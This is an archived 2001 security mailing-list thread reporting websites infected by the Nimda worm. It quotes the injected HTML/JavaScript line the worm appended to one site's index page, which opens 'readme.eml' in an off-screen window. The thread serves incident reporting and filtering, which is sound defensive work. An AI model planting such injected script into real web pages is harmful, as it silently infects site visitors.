Interestingly, the content type from www.wininternals.com (aka 207.30.43.69, aka underconstruction.infoback.net) is application/octet-stream. The content type on www.digimind.fr is correct at "message/rfc822." Something to keep in mind if you're setting up filters. .nhoJ On Wed, 19 Sep 2001, Jac Engel wrote: |Date: Wed, 19 Sep 2001 19:07:22 +0200 |From: Jac Engel <jacengelat_private> |To: "acz [iSecureLabs]" <aurelien.cabezonat_private>, incidentsat_private |Subject: RE: Web site infected by Nimda | |http://www.wininternals.com is also infected by Nimda Virus, |after the page is loaded I get a new page |saying : |You have encountered the following error while using Windows Media Player: |---------------------------------------------------------------------------- |---- |Error# 8007000D |Sorry, no more help is available for this problem at this time. | |Jac | |-----Original Message----- |From: acz [iSecureLabs] [mailto:aurelien.cabezonat_private] |Sent: Sunday, September 19, 1999 5:46 PM |To: incidentsat_private |Subject: Web site infected by Nimda | | |Hi all, | |http://www.digimind.fr/ is infected by Nimda virus ! | |This line was added at the end of the index.html | |---<cut>--- |<html><script language="JavaScript">window.open("readme.eml", null, |"resizable=no,top=6000,left=6000")</script></html> |---<cut>--- | |If you wanna visit digimind.fr, turn your webbrowser javascript off ! | |--- |Cabezon Aurelien |http://www.iSecureLabs.com | | |---------------------------------------------------------------------------- |This list is provided by the SecurityFocus ARIS analyzer service. |For more information on this free incident handling, management |and tracking system please see: http://aris.securityfocus.com | | |---------------------------------------------------------------------------- |This list is provided by the SecurityFocus ARIS analyzer service. |For more information on this free incident handling, management |and tracking system please see: http://aris.securityfocus.com | ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Sep 19 2001 - 10:55:41 PDT